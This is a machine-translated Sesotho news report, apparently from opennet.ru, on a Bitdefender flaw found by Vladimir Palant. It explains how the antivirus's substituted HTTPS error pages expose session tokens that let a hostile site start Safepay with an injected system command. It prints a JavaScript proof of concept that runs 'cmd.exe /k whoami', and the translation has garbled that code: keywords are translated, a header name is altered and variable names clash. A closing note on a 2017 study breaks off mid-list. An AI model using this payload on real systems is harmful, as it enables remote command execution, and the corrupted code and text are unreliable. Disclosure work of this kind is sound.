Vladimir Palant, moetsi oa Adblock Plus,
Sesosa sa bothata ke hore Bitdefender antivirus e thibela sephethephethe sa HTTPS sebakeng sa heno ka ho nkela setifikeiti sa mantlha sa TLS sa sebaka seo. Setifikeiti se eketsehileng sa motso se kenngoa tsamaisong ea bareki, e leng se etsang hore ho khonehe ho pata ts'ebetso ea mokhoa oa ho hlahloba sephethephethe o sebelisoang. Antivirus e ikamahanya le sephethephethe se sirelelitsoeng ebe e kenya khoutu ea eona ea JavaScript maqepheng a mang ho kenya tšebetsong tšebetso ea Safe Search, 'me haeba ho na le mathata ka setifikeiti sa khokahanyo e sireletsehileng, e nkela leqephe la phoso e khutlisitsoeng sebakeng sa eona. Kaha leqephe le lecha la phoso le fanoa molemong oa seva se buloang, maqephe a mang ho seva eo a na le phihlello e felletseng ea litaba tse kentsoeng ke Bitdefender.
Ha o bula sebaka se laoloang ke mohlaseli, sebaka seo se ka romela XMLHttpRequest 'me sa hlahisa mathata ka setifikeiti sa HTTPS ha se arabela, e leng se tla lebisa ho khutliseng ha leqephe la phoso le sentsoeng ke Bitdefender. Kaha leqephe la phoso le buletsoe moelelong oa sebaka sa mohlaseli, a ka bala litaba tsa leqephe la spoofed ka li-parameter tsa Bitdefender. Leqephe le fanoeng ke Bitdefender le boetse le na le senotlolo sa seboka se u lumellang ho sebelisa Bitdefender API ea kahare ho qala seshene se arohaneng sa sebatli sa Safepay, se totobatsang lifolakha tsa mola oa taelo, le ho qala litaelo tsa sistimi u sebelisa "- utility-cmd-prefix" folakha. Mohlala oa tlatsetso (param1 le param2 ke boleng bo fumanoeng leqepheng la phoso):
var kopo = e ncha XMLHttpRequest();
kopo.open("POST", Math.random());
request.setRequestHeader("Mofuta oa litaba", "application/x-www-form-urlencoded");
request.setRequestHeader(«BDNDSS_B67EA559F21B487F861FDA8A44F01C50», param1);
request.setRequestHeader(«BDNDCA_BBACF84D61A04F9AA66019A14B035478», param2);
request.setRequestHeader(«BDNDWB_5056E556833D49C1AF4085CB254FC242», «obk.run»);
request.setRequestHeader(«BDNDOK_4E961A95B7B44CBCA1907D3D3643370D», location.href);
request.send("data:text/html,nada -utility-cmd-prefix=\"cmd.exe /k whoami & echo\"");
A re hopoleng hore boithuto bo entsoeng ka 2017
Ke lihlahisoa tse 11 feela ho tse 26 tse faneng ka li-cipher suite tsa hajoale. 5 litsamaiso ha lia ka tsa netefatsa litifikeiti (Kaspersky Internet Security 16 Mac, NOD32 AV 9, CYBERsitter, Net Nanny 7 Win, Net Nanny 7 Mac). Lihlahisoa tsa Kaspersky Internet Security le Total Security li ne li ka hlaseloa
Source: opennet.ru